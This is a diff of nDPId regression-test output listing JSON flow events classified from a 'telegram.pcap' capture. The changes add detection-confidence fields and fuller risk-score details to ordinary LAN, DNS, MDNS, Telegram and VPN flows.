-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":180000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1588779596464,"flow_last_seen":1588779654853,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Telegram","breed":"Acceptable","category":"Chat"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}}
